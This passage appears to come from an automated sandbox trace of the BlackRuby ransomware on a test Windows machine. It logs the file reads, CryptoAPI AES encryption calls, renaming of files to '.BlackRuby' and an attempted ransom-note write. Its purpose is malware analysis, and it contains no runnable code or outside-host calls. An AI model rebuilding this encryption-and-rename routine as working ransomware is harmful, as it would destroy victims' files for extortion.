J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\rzi5xoyjnl9t.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.049] GetLastError () returned 0x0 [0059.049] GetFileType (hFile=0x184) returned 0x1 [0059.049] SetErrorMode (uMode=0x0) returned 0x1 [0059.049] GetFileType (hFile=0x184) returned 0x1 [0059.049] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xba67 [0059.049] GetLastError () returned 0x0 [0059.049] ReadFile (in: hFile=0x184, lpBuffer=0x1cbc1dc, nNumberOfBytesToRead=0xba67, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1cbc1dc*, lpNumberOfBytesRead=0x18eb68*=0xba67, lpOverlapped=0x0) returned 1 [0059.050] GetLastError () returned 0x0 [0059.050] CloseHandle (hObject=0x184) returned 1 [0059.050] GetLastError () returned 0x0 [0059.050] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", lpFilePart=0x0) returned 0x71 [0059.050] GetLastError () returned 0x0 [0059.050] SetErrorMode (uMode=0x1) returned 0x0 [0059.050] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\rzi5xoyjnl9t.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb2158d0, ftCreationTime.dwHighDateTime=0x1d34c40, ftLastAccessTime.dwLowDateTime=0xed0f87b0, ftLastAccessTime.dwHighDateTime=0x1d34a0b, ftLastWriteTime.dwLowDateTime=0xed0f87b0, ftLastWriteTime.dwHighDateTime=0x1d34a0b, nFileSizeHigh=0x0, nFileSizeLow=0xba67)) returned 1 [0059.050] GetLastError () returned 0x0 [0059.050] SetErrorMode (uMode=0x0) returned 0x1 [0059.060] CryptImportKey (in: hProv=0x37c818, pbData=0x1d2daec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x3609e0) returned 1 [0059.060] GetLastError () returned 0x0 [0059.060] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.060] GetLastError () returned 0x0 [0059.093] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.093] GetLastError () returned 0x0 [0059.093] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360a20) returned 1 [0059.093] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.093] GetLastError () returned 0x0 [0059.093] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1b62314*=0x1, dwFlags=0x0) returned 1 [0059.093] GetLastError () returned 0x0 [0059.094] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1b622e0, dwFlags=0x0) returned 1 [0059.094] GetLastError () returned 0x0 [0059.094] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6235c*, pdwDataLen=0x18eb58*=0xbb60, dwBufLen=0xbb60 | out: pbData=0x1b6235c*, pdwDataLen=0x18eb58*=0xbb60) returned 1 [0059.094] GetLastError () returned 0x0 [0059.094] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b79a48*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b79a48*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.094] GetLastError () returned 0x0 [0059.094] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b79a78*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b79a78*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.094] GetLastError () returned 0x0 [0059.095] CryptDestroyKey (hKey=0x3609e0) returned 1 [0059.095] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0059.095] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0059.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", lpFilePart=0x0) returned 0x71 [0059.095] GetLastError () returned 0x0 [0059.095] SetErrorMode (uMode=0x1) returned 0x0 [0059.095] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\rzi5xoyjnl9t.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.096] GetLastError () returned 0xb7 [0059.096] GetFileType (hFile=0x184) returned 0x1 [0059.096] SetErrorMode (uMode=0x0) returned 0x1 [0059.096] GetFileType (hFile=0x184) returned 0x1 [0059.098] CloseHandle (hObject=0x184) returned 1 [0059.098] GetLastError () returned 0xb7 [0059.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", lpFilePart=0x0) returned 0x71 [0059.098] GetLastError () returned 0xb7 [0059.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_oqp5skSZgKg3WQgP63YxV1B1IdI9GMOXkVjMexYIkgbr5U.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_oqp5skSZgKg3WQgP63YxV1B1IdI9GMOXkVjMexYIkgbr5U.BlackRuby", lpFilePart=0x0) returned 0xa2 [0059.098] GetLastError () returned 0xb7 [0059.098] SetErrorMode (uMode=0x1) returned 0x0 [0059.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\rzi5xoyjnl9t.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb2158d0, ftCreationTime.dwHighDateTime=0x1d34c40, ftLastAccessTime.dwLowDateTime=0xed0f87b0, ftLastAccessTime.dwHighDateTime=0x1d34a0b, ftLastWriteTime.dwLowDateTime=0x2b6c09e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xbb70)) returned 1 [0059.098] GetLastError () returned 0xb7 [0059.098] SetErrorMode (uMode=0x0) returned 0x1 [0059.098] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\rzi5xoyjnl9t.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_oqp5skSZgKg3WQgP63YxV1B1IdI9GMOXkVjMexYIkgbr5U.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_oqp5skszgkg3wqgp63yxv1b1idi9gmoxkvjmexyikgbr5u.blackruby")) returned 1 [0059.098] GetLastError () returned 0xb7 [0059.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0059.098] GetLastError () returned 0xb7 [0059.098] SetErrorMode (uMode=0x1) returned 0x0 [0059.098] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.099] GetLastError () returned 0x5 [0059.099] SetErrorMode (uMode=0x0) returned 0x1 [0059.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_", lpFilePart=0x0) returned 0x60 [0059.099] GetLastError () returned 0x5 [0059.099] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.099] GetLastError () returned 0x5 [0059.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.099] GetLastError () returned 0x5 [0059.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_", lpFilePart=0x0) returned 0x60 [0059.099] GetLastError () returned 0x5 [0059.099] SetErrorMode (uMode=0x1) returned 0x0 [0059.100] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x5 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.100] GetLastError () returned 0x12 [0059.100] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0059.100] SetErrorMode (uMode=0x0) returned 0x1 [0059.100] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_", lpFilePart=0x0) returned 0x60 [0059.100] GetLastError () returned 0x12 [0059.100] SetErrorMode (uMode=0x1) returned 0x0 [0059.100] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0059.100] GetLastError () returned 0x12 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x12 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x12 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x12 [0059.100] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.100] GetLastError () returned 0x12 [0059.101] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.101] GetLastError () returned 0x12 [0059.101] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.101] GetLastError () returned 0x12 [0059.101] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.101] GetLastError () returned 0x12 [0059.101] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0059.101] SetErrorMode (uMode=0x0) returned 0x1 [0059.101] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", lpFilePart=0x0) returned 0x73 [0059.101] GetLastError () returned 0x12 [0059.101] SetErrorMode (uMode=0x1) returned 0x0 [0059.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\clp6-cw-_vyvtp.odt"), fInfoLevelId=0x0, lpFileInformation=0x1ba5090 | out: lpFileInformation=0x1ba5090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc63e7b0, ftCreationTime.dwHighDateTime=0x1d358e7, ftLastAccessTime.dwLowDateTime=0x9cee8420, ftLastAccessTime.dwHighDateTime=0x1d3546a, ftLastWriteTime.dwLowDateTime=0x9cee8420, ftLastWriteTime.dwHighDateTime=0x1d3546a, nFileSizeHigh=0x0, nFileSizeLow=0xae33)) returned 1 [0059.101] GetLastError () returned 0x12 [0059.101] SetErrorMode (uMode=0x0) returned 0x1 [0059.101] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", lpFilePart=0x0) returned 0x73 [0059.101] GetLastError () returned 0x12 [0059.101] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", lpFilePart=0x0) returned 0x73 [0059.101] GetLastError () returned 0x12 [0059.101] SetErrorMode (uMode=0x1) returned 0x0 [0059.101] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\clp6-cw-_vyvtp.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.101] GetLastError () returned 0x0 [0059.101] GetFileType (hFile=0x184) returned 0x1 [0059.101] SetErrorMode (uMode=0x0) returned 0x1 [0059.101] GetFileType (hFile=0x184) returned 0x1 [0059.101] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xae33 [0059.101] GetLastError () returned 0x0 [0059.101] ReadFile (in: hFile=0x184, lpBuffer=0x1ba72dc, nNumberOfBytesToRead=0xae33, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1ba72dc*, lpNumberOfBytesRead=0x18eb68*=0xae33, lpOverlapped=0x0) returned 1 [0059.102] GetLastError () returned 0x0 [0059.102] CloseHandle (hObject=0x184) returned 1 [0059.102] GetLastError () returned 0x0 [0059.102] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", lpFilePart=0x0) returned 0x73 [0059.102] GetLastError () returned 0x0 [0059.102] SetErrorMode (uMode=0x1) returned 0x0 [0059.102] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\clp6-cw-_vyvtp.odt"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc63e7b0, ftCreationTime.dwHighDateTime=0x1d358e7, ftLastAccessTime.dwLowDateTime=0x9cee8420, ftLastAccessTime.dwHighDateTime=0x1d3546a, ftLastWriteTime.dwLowDateTime=0x9cee8420, ftLastWriteTime.dwHighDateTime=0x1d3546a, nFileSizeHigh=0x0, nFileSizeLow=0xae33)) returned 1 [0059.103] GetLastError () returned 0x0 [0059.103] SetErrorMode (uMode=0x0) returned 0x1 [0059.103] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c790) returned 1 [0059.103] GetLastError () returned 0x0 [0059.138] CryptImportKey (in: hProv=0x37c790, pbData=0x1c17388, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360b60) returned 1 [0059.138] GetLastError () returned 0x0 [0059.138] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.138] GetLastError () returned 0x0 [0059.143] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.143] GetLastError () returned 0x0 [0059.143] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ce0) returned 1 [0059.143] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.143] GetLastError () returned 0x0 [0059.143] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1c443d4*=0x1, dwFlags=0x0) returned 1 [0059.143] GetLastError () returned 0x0 [0059.143] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1c443a0, dwFlags=0x0) returned 1 [0059.143] GetLastError () returned 0x0 [0059.143] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4441c*, pdwDataLen=0x18eb58*=0xaf30, dwBufLen=0xaf30 | out: pbData=0x1c4441c*, pdwDataLen=0x18eb58*=0xaf30) returned 1 [0059.144] GetLastError () returned 0x0 [0059.144] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c5a2a8*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c5a2a8*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.144] GetLastError () returned 0x0 [0059.144] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c5a2d8*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c5a2d8*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.144] GetLastError () returned 0x0 [0059.145] CryptDestroyKey (hKey=0x360b60) returned 1 [0059.145] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.145] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.145] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", lpFilePart=0x0) returned 0x73 [0059.145] GetLastError () returned 0x0 [0059.145] SetErrorMode (uMode=0x1) returned 0x0 [0059.145] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\clp6-cw-_vyvtp.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.146] GetLastError () returned 0xb7 [0059.146] GetFileType (hFile=0x184) returned 0x1 [0059.146] SetErrorMode (uMode=0x0) returned 0x1 [0059.146] GetFileType (hFile=0x184) returned 0x1 [0059.147] CloseHandle (hObject=0x184) returned 1 [0059.147] GetLastError () returned 0xb7 [0059.148] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt", lpFilePart=0x0) returned 0x73 [0059.148] GetLastError () returned 0xb7 [0059.148] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A 